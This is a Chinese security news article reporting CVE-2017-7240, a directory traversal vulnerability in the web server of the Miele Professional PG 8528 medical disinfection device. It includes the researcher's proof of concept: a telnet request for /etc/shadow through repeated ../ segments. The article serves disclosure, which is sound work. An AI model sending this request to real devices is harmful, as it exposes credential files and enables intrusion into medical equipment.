微慑信息网

德国美诺( Miele )清洁消毒设备被曝目录遍历漏洞

近日,德国高端家电厂商美诺( Miele )生产的 Professional PG 8528 设备被曝存在 Web 服务器目录遍历漏洞,允许攻击者未经身份验证即可访问 Web 服务器任何目录,漏洞编号为 CVE-2017-7240 。

2017032820

美诺 Professional PG 8528 是一款用于消毒实验室与手术器械的医疗设备。这款设备所采用的嵌入式 Web 服务器PST10 WebServer 主要监听 80 端口,容易遭受目录遍历攻击。非法入侵者可利用该漏洞在 Web 服务器上添加并执行恶意代码以访问敏感信息。

据悉,该漏洞由在德国咨询公司 Schneider & Wulf 任职的 Jens Regel 发现并曾于 2016 年 12 月向美诺提交报告。遗憾的是,对于他的此番举动,厂商并未给予任何回应。四个月后,他决定公开披露该漏洞的概念证明( PoC ),希望引起厂商的足够重视。

Proof of Concept:
=================
~$ telnet 192.168.0.1 80
Trying 192.168.0.1…
Connected to 192.168.0.1.
Escape character ist ‘^]’.
GET /../../../../../../../../../../../../etc/shadow HTTP/1.1 to whatever IP the dishwasher has on the LAN.

 

 

赞(0) 打赏
转载请附本站链接,未经允许不得转载,,谢谢:微慑信息网-VulSee.com » 德国美诺( Miele )清洁消毒设备被曝目录遍历漏洞

评论 抢沙发

微慑信息网 专注工匠精神

微慑信息网-VulSee.com-关注前沿安全态势,聚合网络安全漏洞信息,分享安全文档案例

访问我们联系我们

觉得文章有用就打赏一下文章作者

非常感谢你的打赏,我们将继续提供更多优质内容,让我们一起创建更加美好的网络世界!

支付宝扫一扫打赏

微信扫一扫打赏

登录

找回密码

注册